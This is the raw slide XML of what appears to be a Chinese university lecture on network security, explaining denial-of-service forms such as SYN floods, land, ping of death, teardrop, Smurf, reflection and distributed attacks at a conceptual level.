            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>安全威胁（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>Security Threats </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>）</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>攻击分类（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>Attack Classification</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>）</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="604162" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>Classes of Threats</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="67588" name="日期占位符 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5129336" y="6407944"/>
            <a:ext cx="1026840"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812966B7-5659-408E-B83A-762FD80309A2}" type="datetime1">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DOS攻击的基本形式</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" smtClean="0"/>
              <a:t>(2) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" smtClean="0"/>
              <a:t>消息流</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2800" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" smtClean="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>向一台网络上的目标主机发送大量的数据报，来延缓目标主机的处理速度，阻止它处理正常的任务。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" smtClean="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>这些</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" smtClean="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>数据可能是请求文件服务，要求登录或者仅仅是简单的要求响应数据报。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" smtClean="0"/>
              <a:t>(3) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" smtClean="0"/>
              <a:t>信号接地</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2800" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" smtClean="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>物理方法关闭网络。将网络的电缆接地，引入一些其他信号或者将以太网上的端接器拿走，都可以有效地阻止客户发送或者接收消息。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" smtClean="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="日期占位符 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="quarter" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="6356350"/>
            <a:ext cx="2133600" cy="365125"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>www.uestc.edu.cn</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24581" name="页脚占位符 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3124200" y="6356350"/>
            <a:ext cx="2895600" cy="365125"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>UESTC</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0">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smtClean="0"/>
              <a:t>(4) "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>粘住</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>攻击</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>TCP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>的半连接耗尽资源。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>攻击者发出多个连接请求。初步建立了连接，但又没有完成其后的连接步骤，接收者便会保留许多这种半连接，占据有限的资源。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>通常这些连接请求使用的是伪造的源地址，连接来自于一台不存在的主机或者一台无法访问的主机。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="112643" name="标题 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>DOS攻击的基本形式</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0"/>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1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="85000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>资源对抗：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>攻击者使用攻击机的资源（时间、计算能力、网络带宽等）消耗受害者的资源</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>简单</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>DOS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>攻击：单挑</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>使用攻击者单机资源</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>反射攻击：嫁祸</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>使用反射服务器的资源进行攻击</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>反射服务：网络中能对服务或查询等请求进行应答的服务器</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>分布式拒绝服务攻击：围殴</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>控制网络中的傀儡主机，僵尸网络，使用其资源进行攻击</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"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拒绝服务攻击的本质</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="69635" name="灯片编号占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:noFill/>
          <a:ln>
            <a:miter lim="800000"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" numCol="1" anchorCtr="0" compatLnSpc="1"/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{3A8CEF7F-E2C0-4D46-B177-FC6E805B1673}"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land</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>ping of death</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>teardrop</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>SYN Flood</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>Smurf</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="标题 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>典型</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>DoS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>攻击</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zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>向被攻击主机发起特别的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>TCP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>连接请求</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>SYN</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>包</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>——</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>第一次握手</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>源</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>地址欺骗：以受害者</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>为源</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>IP——</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>源、目的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>相同</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>导致：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>被攻击主机向</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>它</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>自己发送</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>SYN</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>一</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>ACK</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>应答</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>——</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>第二次握手</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>自己又向自己发</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>回</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>ACK</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>应答</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>——</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>第三次握手，创建</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>一个空</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>连接</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>每</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>一个这样的连接都将保留直到超时掉</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>影响：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>许多</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>UNIX</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>系统将崩溃，而 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Windows NT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>会变的极其缓慢（大约持续五分钟）。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="标题 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>Land——</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>自握手</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pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="图片 5"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6732241" y="56208"/>
            <a:ext cx="2386608" cy="2223548"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="slow">
    <p:pull/>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smtClean="0"/>
              <a:t>死</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>ping(ping of death)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20483" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1600200"/>
            <a:ext cx="8507413" cy="4525963"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>许多操作系统</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>早期</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>版本限制网络数据包的最大长度，</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>如</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>TCP/IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>协议的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>ICMP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>包最大</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>64KB</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>。接收方读取包的报头后，要根据该报头信息来为有效载荷生成缓冲区。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>ping of death</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>攻击包声称其长度超过</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>ICMP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>64K</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>上限，使接收方出现内存分配错误，导致</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>TCP/IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>堆栈崩溃，致使接受方当机</a:t>
            </a:r>
            <a:endParaRPr lang="zh-C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1" end="1"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="13"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2" end="2"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="19"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a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
